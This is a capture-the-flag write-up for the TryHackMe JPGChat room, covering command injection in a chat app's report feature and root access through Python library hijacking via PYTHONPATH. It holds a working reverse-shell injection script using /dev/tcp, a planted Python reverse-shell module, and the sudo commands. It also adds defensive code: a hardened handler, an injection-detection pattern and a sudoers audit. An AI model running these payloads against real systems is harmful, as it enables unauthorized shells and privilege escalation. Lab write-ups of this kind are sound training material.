JPGChat

Penthos
4 min read · Jun 14, 2021

Room link: https://tryhackme.com/room/jpgchat

Enumeration

Let’s start, as all good hacks do, with a quick Nmap scan to see what I’m working with.

It seems only SSH and a service Nmap labels as PPP on port 3000 are open.

Let’s try to connect to it with nc (Netcat):

nc -nv IPADDRESS 3000

We get this as a response; it seems to be some kind of chat service with a report feature.

Playing with the app, we need to supply [MESSAGE] or [REPORT] to get any output. From the REPORT feature we get the name of the admin!

Let’s do some recon on the application. I head over to GitHub and do a username search for “mozzie-jpg”, which gives us his GitHub account. Looking at his repos we can see the JPChat application.

Checking the source code of JPchat.py:

We can see the message and report functions. Looking at the report_form function we can see a few calls to os.system; maybe we can use command injection here to break out of the string and get a reverse shell.

After some playing with the commands, I found this format to work: “; id #”
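Why “; id #” works, and what the fix looks like, is easier to see side by side. The following is an added example, not JPChat’s own code: report_form_vulnerable is a hypothetical reconstruction of the os.system pattern the writeup describes (the command string is returned for inspection and never executed), looks_like_injection is a simple detection heuristic for report text carrying shell metacharacters, and report_form_hardened writes the report with plain file I/O so no shell is involved at all. The function names and the log file path are assumptions.

```python
import os
import re
import tempfile

# Hypothetical reconstruction of the vulnerable pattern: user-supplied report
# text is interpolated, unquoted, into a shell command string. Not JPChat's
# real code; the command is returned so it can be inspected, never run.
def report_form_vulnerable(name: str, text: str, logfile: str) -> str:
    cmd = f"echo {name}: {text} >> {logfile}"
    # os.system(cmd)  <- the injectable sink. With text "; id #" the shell
    #                    ends the echo at ";", runs "id", and "#" comments
    #                    out the redirect, so nothing even reaches the log.
    return cmd

# Characters that let user text change the structure of a shell command.
_SHELL_META = re.compile(r"[;&|`$<>()\n\r]")

def looks_like_injection(text: str) -> bool:
    """Detection heuristic: flag report text that carries shell metacharacters."""
    return _SHELL_META.search(text) is not None

def report_form_hardened(name: str, text: str, logfile: str) -> str:
    """Write the report without a shell; metacharacters become ordinary bytes."""
    if re.search(r"[\r\n]", name):
        raise ValueError("name must be a single line")
    # Newlines in the body would let one report forge extra log entries.
    body = " ".join(text.splitlines())
    line = f"{name}: {body}"
    with open(logfile, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line

def demo_hardened(name: str = "wes", text: str = "; id #") -> tuple:
    """Run the hardened handler on the writeup's payload inside a temp dir.
    Returns (line the function reported, what actually landed in the file)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "reports.txt")  # assumed log location
        written = report_form_hardened(name, text, path)
        with open(path, encoding="utf-8") as fh:
            content = fh.read()
    return written, content

if __name__ == "__main__":
    print(report_form_vulnerable("wes", "; id #", "/tmp/reports.txt"))
    print(looks_like_injection("; id #"))
    print(demo_hardened())
```

The hardened version deliberately does not try to escape or quote the text for a shell: once the log is written from Python directly there is no command to inject into, which is the fix a code reviewer should ask for whenever os.system is fed user input.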

User

As we are using Python (hint from the room name), it’s best we make a script to automate the process for us.

Using the code I wrote to connect, I got a reverse shell as a user called wes.

# Copy and paste the code into a file and change the IP addresses
# TARGET IP = the target machine's IP (the one from the TryHackMe page)
# YOUR IP   = change to your IP, and change the port if you need to
import socket

IP = "10.10.0.0"  # TARGET IP
PORT = 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
recv = s.recv(1024).decode()          # banner / menu

message = "[REPORT]\n\r"              # choose the report feature
s.send(message.encode())
recv = s.recv(1024).decode()          # prompt for the name

name = "wes\n\r"
s.send(name.encode())
r = s.recv(1024).decode()             # prompt for the report text

report_text = "; bash -i >& /dev/tcp/10.10.0.0/9999 0>&1 #\n\r"  # YOUR IP
s.send(report_text.encode())

print("Dont close until you have a stable shell\n\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'")
s.recv(1024).decode()                 # keep the socket open while the shell runs
s.recv(1024).decode()

We can now get the user flag in /home/wes.

Root

Now I start to enumerate again. I check sudo -l first, as usual, and notice we have something:

We can run /usr/bin/python3 /opt/development/test_module.py as root.

Running it just returns True.

If we cat the file test_module.py we get the source code to examine:

I notice that there is a * being imported from the compare module. Looking up Python library abuse, I come across a great article about how to abuse Python libraries.

Privilege Escalation via Python library hijacking

Checking sudo -l again we can see that SETENV: and env_keep+=PYTHONPATH are set. What’s that?

After a quick Google search, it seems Python will load libraries from any directory listed in the PYTHONPATH environment variable. So if we make a new file with a reverse shell inside, say /tmp/compare.py, set PYTHONPATH to /tmp and run sudo -u root /usr/bin/python3 /opt/development/test_module.py, we should get a root shell back! Let’s try it!

Make a file in /tmp called compare.py with the following Python 3 reverse shell. Swap your IP address into the code (replace <<IPADDRESS>> with your own):


import socket, subprocess, os

# connect back to your listener and wire stdin/stdout/stderr to the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<<IPADDRESS>>", 7777))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty; pty.spawn("/bin/bash")

Then point PYTHONPATH at the directory holding our compare.py:

export PYTHONPATH=/tmp

Start a Netcat listener on your PC, then run the command from sudo -l:

sudo -u root /usr/bin/python3 /opt/development/test_module.py
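From the defender’s side, the two things that made this work are visible in a sudoers file and in Python’s import search order, and both can be checked programmatically. The block below is an added example, not code from the room or the project: audit_sudoers flags env_keep entries and SETENV rules that let a caller control an interpreter’s module search path (the sudoers lines it runs on are constructed samples, not copied from the machine), resolve_module uses importlib’s real PathFinder to show which compare.py an import would pick up for a given search order, and demo_hijack_resolution plays through the hijack and its fix in a temporary directory that stands in for /opt/development and /tmp.

```python
import importlib
import importlib.machinery
import os
import re
import tempfile

# Constructed sudoers lines (not copied from the room) reproducing the
# pattern the writeup describes: env_keep for PYTHONPATH plus SETENV on a
# python command. The alice line is a control that should not be flagged.
SAMPLE_SUDOERS = """\
Defaults    env_reset
Defaults    env_keep += "PYTHONPATH"
wes   ALL=(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# Environment variables that redirect an interpreter's or loader's search path.
RISKY_ENV = {"PYTHONPATH", "PERL5LIB", "LD_PRELOAD", "LD_LIBRARY_PATH"}

def audit_sudoers(text: str) -> list:
    """Return findings for rules that let the caller choose what root imports."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        m = re.match(r'Defaults\b.*\benv_keep\s*\+?=\s*"?([^"]*)"?', line)
        if m:
            for var in m.group(1).split():
                if var in RISKY_ENV:
                    findings.append(f"env_keep preserves {var}: {line}")
            continue
        if re.search(r"\bSETENV:", line) and "python" in line:
            findings.append(
                f"SETENV on a python command lets the caller set PYTHONPATH: {line}")
    return findings

def resolve_module(name: str, search_path: list):
    """Which file would `import name` load for this search-path order?"""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    return spec.origin if spec else None

def demo_hijack_resolution() -> tuple:
    """(hijack succeeds when compare.py is missing next to the script,
        shipping the real compare.py beside the script wins instead)."""
    with tempfile.TemporaryDirectory() as d:
        script_dir = os.path.join(d, "development")  # stands in for /opt/development
        writable = os.path.join(d, "tmp")            # stands in for /tmp
        os.makedirs(script_dir)
        os.makedirs(writable)
        with open(os.path.join(writable, "compare.py"), "w") as fh:
            fh.write("# planted module\n")
        # sys.path[0] is the script's directory, then PYTHONPATH entries.
        hijacked = resolve_module("compare", [script_dir, writable])
        hijack_ok = os.path.samefile(hijacked, os.path.join(writable, "compare.py"))

        # Fix: the real module lives next to the script and is found first.
        with open(os.path.join(script_dir, "compare.py"), "w") as fh:
            fh.write("def compare(a, b):\n    return a == b\n")
        importlib.invalidate_caches()               # new file in a scanned dir
        legit = resolve_module("compare", [script_dir, writable])
        fix_ok = os.path.samefile(legit, os.path.join(script_dir, "compare.py"))
    return hijack_ok, fix_ok

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
    print(demo_hijack_resolution())
```

Two remediations follow directly from what the audit flags: remove the env_keep entry for PYTHONPATH and the SETENV tag from the rule, and make the script’s dependency resolvable without trusting the caller’s environment (ship compare.py beside the script, or run the interpreter with python3 -I, which ignores PYTHONPATH and the user site directory).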

Now you can go and grab the last flag in /root/root.txt.

I hope you found this method interesting, I sure did! Shout out to the creators for an epic room.
